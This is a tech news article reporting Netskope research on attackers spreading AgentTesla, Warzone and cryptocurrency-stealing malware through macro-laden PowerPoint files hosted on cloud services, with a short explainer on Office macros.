PowerPoint is being used as a lure to spread malware
Malicious actors are sharing malware-bearing PowerPoint files, stored in legitimate cloud services
When you purchase through links on our site, we may earn an affiliate commission.Here’s how it works.
Threat actors are increasingly turning towardsMicrosoft PowerPointfiles to distribute different types ofmalware.
New Netskope research found that since the end of 2021, numerous hacking groups started using legitimatecloudservices to host PowerPoint files which, with the help of the dreaded macros, can deploy all kinds of nasties into target devices.
Netskope says that three families of malware dominate: Warzone (aka AveMaria), and AgentTesla - both of which are powerful Remote Access Trojans (RAT), as well as cryptocurrency stealers.
Hijacking the clipboard to steal bitcoin
The researchers claim the PowerPoint file carries with it an obfuscated macro, that gets executed by a combination of built-in Windows tools, PowerShell, and MSHTA.
Once executed, the VBS script creates a new Windows entry, and executes two additional scripts, one that downloadsAgentTesla, while the other one disables the Windows built-inantivirussolution,MicrosoftDefender.
While it’s a known fact that AgentTesla stealsbrowserpasswords, keystrokes, clipboard contents, and similar data, very little is known (and shared by Netskope) about Warzone.
The third payload is a cryptocurrency stealer, which scans the clipboard for data that matches a cryptocurrency wallet. If it finds it, the next time the victim copies a cryptocurrency wallet, it will paste a different one, belonging to the attackers.
Are you a pro? Subscribe to our newsletter
Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!
Office macros have been the staple of malware distribution for ages. They’re a tool which allows Office files to contain embedded code, written in the Visual Basic for Applications (VBA) programming language. The code can hold multiple commands that can be recorded and replayed later. Initially designed to help automate repetitive tasks, they’ve since been hijacked by criminals abusing them to distribute malware.
It has gotten to the point where Microsoft disabled Excel 4.0 macros by default to keep the users safe.
Via:BleepingComputer
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
Washington state court systems taken offline following cyberattack
Is it still worth using Proton VPN Free?
MacBook Air OLED reportedly delayed until at least 2028 – here’s why
